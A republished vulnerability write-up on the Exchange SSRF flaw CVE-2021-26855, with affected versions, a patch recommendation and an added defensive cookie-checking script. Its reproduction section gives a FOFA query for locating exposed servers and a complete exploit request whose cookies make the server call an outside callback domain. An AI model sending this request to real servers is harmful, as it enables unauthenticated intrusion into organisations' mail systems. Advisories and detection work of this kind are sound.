
Analysis of the Exchange SSRF vulnerability CVE-2021-26855

Updated 2025-01-23. From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31 Report

In this issue, the editor brings you an analysis of the Exchange SSRF vulnerability CVE-2021-26855. The article covers the vulnerability description, the affected versions, reproduction and the repair recommendation.

0x01 Vulnerability description

Exchange Server is Microsoft's email server product, a messaging and collaboration system. On March 3, 2021, Microsoft released Exchange security updates that disclosed several high-risk and critical vulnerabilities. Among them is CVE-2021-26855, an Exchange SSRF vulnerability: an attacker can directly construct malicious requests, make the Exchange server issue arbitrary HTTP requests, scan the intranet, and obtain Exchange user information. The vulnerability can be exploited without authentication.

0x02 Affected versions

Exchange 2013 Versions < 15.00.1497.012
Exchange 2016 CU18 < 15.01.2106.013
Exchange 2016 CU19 < 15.01.2176.009
Exchange 2019 CU7 < 15.02.0721.013
Exchange 2019 CU8 < 15.02.0792.010

0x03 Vulnerability reproduction

FOFA search: app="Exchange" (Note: unauthorized exploitation of hosts on the Internet is illegal.)

Visit the Outlook page.

Start packet capture in Burp and construct the request:

GET /owa/auth/x.js HTTP/1.1
Host: IP
Connection: close
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://IP/owa/auth/logon.aspx?url=https%3a%2f%2PIp%2fowa%2f&reason=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;

The URL accessed is https://xxx.xxx.xxx.xxx/owa/auth/x.js (the file name x.js appears to be arbitrary).

Construct the Cookie information as follows:

Cookie: X-AnonResource=true; X-AnonResource-Backend=oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3

Here "oyq5v1vyqo5komisdc1jfltvzm5dt2.burpcollaborator.net" is the DNSLog domain.

You can use the DNSLog that comes with Burp for verification:

Open Burp and select Burp Collaborator client:

Each DNSLog platform displays a different message, but the callback is returned successfully on each:

1. dnslog.cn

2. ceye

3. Zero group DNSLog
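
A defender-side check for the request pattern shown above, as an added example that is not part of the original article: it parses a raw HTTP request and reports any X-AnonResource-Backend or X-BEResource cookie that names a host outside an allow-list. The function names, the allow-list parameter and the sample requests are assumptions constructed for illustration.

```python
# Added example. Assumption: clients have no reason to name hosts outside the allow-list.
ROUTING_COOKIES = ("x-anonresource-backend", "x-beresource")

def parse_cookies(raw_request):
    """Return {lowercased cookie name: value} from a raw HTTP request's Cookie header."""
    cookies = {}
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.splitlines()[1:]:  # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() != "cookie":
            continue
        for pair in value.split(";"):
            key, sep, val = pair.strip().partition("=")
            if sep:
                cookies[key.lower()] = val
    return cookies

def backend_host(value):
    """Host part of a 'host/path?~N' value, lowercased, port dropped (no IPv6 literals)."""
    return value.split("/", 1)[0].partition(":")[0].strip().lower()

def find_ssrf_indicators(raw_request, allowed_backends=()):
    """List (cookie, host) pairs where a routing cookie names a host outside the allow-list."""
    allowed = {h.lower() for h in allowed_backends}
    hits, cookies = [], parse_cookies(raw_request)
    for name in ROUTING_COOKIES:
        host = backend_host(cookies.get(name, ""))
        if host and host not in allowed:
            hits.append((name, host))
    return hits

# Constructed sample requests (placeholder hosts, not captured traffic).
SUSPICIOUS = "\r\n".join([
    "GET /owa/auth/x.js HTTP/1.1",
    "Host: mail.example.invalid",
    "Cookie: X-AnonResource=true; "
    "X-AnonResource-Backend=dnslog.example.invalid/ecp/default.flt?~3; "
    "X-BEResource=localhost/owa/auth/logon.aspx?~3;",
    "", ""])
BENIGN = "\r\n".join([
    "GET /owa/auth/logon.aspx HTTP/1.1",
    "Host: mail.example.invalid",
    "Cookie: ClientId=ABCDEF; OutlookSession=constructed",
    "", ""])

if __name__ == "__main__":
    for label, req in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, find_ssrf_indicators(req))
```

The same check can run wherever full request headers are visible, such as a reverse proxy or WAF in front of Exchange.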

0x04 Repair recommendation

Upgrade to the latest secure version.

The above is the editor's analysis of the Exchange SSRF vulnerability CVE-2021-26855. If you have similar questions, you can refer to the analysis above. If you want to know more, you are welcome to follow the industry information channel.
